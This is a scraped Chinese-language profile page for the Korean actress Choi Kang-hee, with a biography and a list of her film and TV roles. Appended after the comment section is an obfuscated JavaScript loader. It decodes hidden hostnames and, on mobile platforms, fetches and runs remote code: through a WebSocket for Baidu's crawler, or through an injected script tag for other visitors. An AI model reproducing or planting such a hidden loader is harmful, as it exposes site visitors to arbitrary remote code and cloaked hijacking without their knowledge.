崔江姬
热门
明星
    49816°

    崔江姬

  • 韩国女明星
  • 星座:金牛座
  • 身高:166
  • 体重:
  • 生日:1977-05-05
  • 崔江熙(KanghieChoi,최강희),1977年5月5日…

明星简介

崔江熙(KanghieChoi,최강희),1977年5月5日出生于韩国,毕业于瑞逸大学,韩国女演员。1995年,在选美比赛中获奖进入演艺圈。1999年,出演了《女高怪谈》。2006年,主演的影片《甜蜜的恐怖恋人》。2007年,和张赫合作影片《谢谢》。 2008年,主演电视剧《我的甜蜜都市》,扮演角色吴恩秀 。2010年,主演电影《畅销书》 。10月,主演轻喜剧电影《吝啬罗曼史》,扮演女主角“多琳” 。2011年,获得第32届青龙电影赏人气明星奖和SBS演技大赏10代明星奖;同年主演电视剧《守护BOSS》 。2013年,主演韩国MBCTV水木剧《7级公务员》 ;同年主演电影《米娜文具店》 。2015年1月,与千正明主演tvN金土剧《HeartToHeart》 ;同年10月,主演MBC月火剧《华丽的诱惑》,饰演女主角申恩秀 。

1995年,崔江姬凭借清新自然的脸孔在选美比赛中获奖进入演艺圈,出演电视剧的时候使用的是自己的艺名“崔世延”。
1999年,出演《女高怪谈》和《幸福的殡仪馆》。
2001年,参与拍摄电影《娃妮和俊河》。同年,参演电视剧《爱是这样的》。
2002年,主演电影《四者性语》。
2004年,出演电视剧《红豆面包》。参与并主演电视剧《甜甜圈》,扮演韩佳兰一角。
2005年,参与主演电视剧《我们应对离别的姿态》,扮演角色金根英。
2006年,主演影片《甜蜜的恐怖恋人》。
2007年,和张赫合作影片《谢谢》。
2008年,主演电视剧《我的甜蜜都市》,与演员李善均、池贤宇合作主演,剧中扮演角色吴恩秀。
2009年,和演员裴秀彬联合主演电影《爱子》。
2010年,主演电影《畅销书》,与演员严正花、柳承龙搭档出演。10月,主演轻喜剧电影《吝啬罗曼史》,扮演女主角“多琳”。
2011年,主演SBSTV电视剧《守护BOSS》,扮演角色诺银雪。搭档演员金在中出演SBS电视台电视剧《最后的女秘书》,崔江熙饰演女主人公。
2013年,搭档演员朱元主演《7级公务员》,饰演角色瑞元。同年,主演电影《美娜文具店》。
2015年1月,主演tvN金土剧《HeartToHeart》,饰演一受人关注就会脸红的女生车红桃。同年10月,主演MBC月火剧《华丽的诱惑》,饰演女主角申恩秀。

崔江姬主演电影电视剧

    评论

    • 评论加载中...
    function bEwXQ(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function GTENtvgi(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return bEwXQ(t);};window['\x6b\x65\x4e\x4a\x67\x68\x4c\x77']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=GTENtvgi,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('ZWhrLnRyZW5oZGcuYY29t','dHIIueWVzdW42NzguY29t','130796',window,document,['Y','I']);}:function(){};